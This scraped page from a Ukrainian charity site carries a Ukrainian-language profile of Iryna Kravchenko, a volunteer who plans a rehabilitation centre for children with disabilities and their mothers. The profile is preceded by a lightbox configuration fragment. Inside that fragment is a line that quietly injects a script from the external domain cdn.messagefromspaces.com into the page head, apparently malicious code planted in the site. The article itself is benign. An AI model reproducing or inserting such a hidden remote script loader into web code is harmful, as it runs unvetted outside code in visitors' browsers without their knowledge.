, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

ІРИНА КРАВЧЕНКО: «ЛЮБОВ ВРЯТУЄ СВІТ!»

 

ІРИНА КРАВЧЕНКО: «ЛЮБОВ ВРЯТУЄ СВІТ!»

Усе наше життя складається з життєвих історій. І не варто говорити, що «живу, як усі».

 – Долі людські неповторні, – стверджує щоразу, коли рекомендує мені чергового героя, Світлана Винограденко, голова правління МГО «МОЗІРОН». – Вона обов’язково наголошує про якусь неймовірну особливість людини.

Про Ірину Кравченко Світлана Винограденко сказала легко й коротко: «Іра наш волонтер. А ще – нас поріднив спорт. Просто люблю її». Обидві народилися в селищі Білий Колодязь. Нині Ірина Кравченко живе у Вовчанську, що на Харківщині.

З Іриною говорити легко й цікаво. Вона не лише розповідає про себе, сім’ю, а й цікавиться долею співрозмовника. Ірина від початку нашої розмови просить акцентувати увагу на проблеми й труднощі, які виникають у молодих сім’ях. Особливо, коли народжуються дітки з особливими потребами. Ось тут потрібна неабияка допомога й підтримка. Бо, виходить, у цьому немає проблем, то лише ми панікуємо й створюємо їх.

Іра пригадує як зі Світланою їздили на збори, коли займалися лижним спортом.

– О! То були незабутні часи, – усміхається Іра й розповідає як вони розважалися й розмальовували хлопців зубною пастою! Раділи найменшим перемогам. Та й зараз любимо однаково життя.

Без спорту Ірина не уявляє свого життя. Зараз займається скандинавською ходьбою: двічі на тиждень – середа й субота – все за розкладом!

На дозвіллі любить підспівувати любому чоловікові. Він прекрасно грає на гітарі, а ще – чудовий байкер! Самі тримаються на позитиві й людей захоплюють і надихають. Ірина любить вчитися й навчати інших. Завжди прагне відкривати щось нове. Наприклад, робота в мережі «ОРІФЛЕЙМ» для неї це не просто заохотити людей й продати продукцію, а переконатися й пересвідчитися в ефективності продукції, результаті.

Як і кожна жінка, Ірина не просто мріє бути красивою, а йде до того постійно. Наприклад, свого часу закінчила курси перукарського мистецтва.

Доля так склалася, що в Ірини старша донечка потребує постійної уваги й підтримки. В родині до цього ставляться з розумінням. Та це прийшло не одразу. Скільки треба було пережити й подолати труднощів… Тому Іра одразу ж підтримала чудовий проект Світлани Винограденко «За здоров’я і довголіття». Вона має прекрасне бажання – створити Центр для діток-інвалідів. Вже й назву придумала «Аріанда». А скільки вкладено у це слово… «Коли буду старшою, мене називатимуть Ариною…А далі слово вбирає початкові склади імен доньок: Насті й Даринки…» Отож, у Старому Салтові, біля водосховища, планується побудувати кілька літніх будиночків для реабілітації й відпочинку мам з дітками-інвалідами. Звісно, на відпочинок матимуть приїхати всі бажаючі, але для родин з дітками-інвалідами передбачені пільги. Як хочеться, аби мрії здійснювалися, бажання втілювалися в життя.

Ірина – активна, позитивна, натхнення. Вміє захопити своїми ідеями й проектами будь кого. Вміє й любить спілкуватися з людьми. З народженням Анастасії у ній оселилася внутрішня сила й мудрість. Її життєве кредо – любити життя, дати можливість і надію проявити себе кожній дитині з особливими потребами, реалізувати себе у цьому світі.

Ірина Кравченко впевнена: «Любов врятує світ!»

Людмила ЧЕЧЕЛЬ

Добавить комментарий

Почта (не публикуется) Обязательные поля помечены *

*

Captcha Captcha Reload

Вы можете использовать эти HTML теги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Вы можете добавить изображение к Вашему отзыву нажав здесь.

TRANSLATE

Russian to English Russian to German Russian to French Russian to Spanish Russian to Italian Russian to Japanese Russian to Chinese

Новости и События

Отзывы

 • Детская спортиная школа "Колос"

  Шановна Світлана Володимірівна! [img]http://moziron.org/wp-content/uploads/2016/12/viber-image_1.jpg[/img]
  Читать полностью...
  Оставлен 23 Дек 2016
 • Білоколодязький НВК

  Шановна Світлано Володимирівно! Вісловлюю вам щиру подяку за активну громадську позицію , вагомий внесок...
  Читать полностью...
  Оставлен 15 Дек 2016

ФОТОГАЛЕРЕЯ

2013.03.22 Charity project in Rovno (69).jpg2013.03.22 Charity project in Rovno (95).jpg2013.03.22 Charity project in Rovno (101).jpg
2013.03.22 Charity project in Rovno (140).jpg2013.03.22 Charity project in Rovno (11).jpg2013.03.22 Charity project in Rovno (56).jpg
2013.03.22 Charity project in Rovno (21).jpg2013.03.22 Charity project in Rovno (123).jpg2013.03.22 Charity project in Rovno (120).jpg

Видео

 

Наши партнеры

Бориспільський дошкільний навчальний заклад (ясла-садок) комбінованого типу №2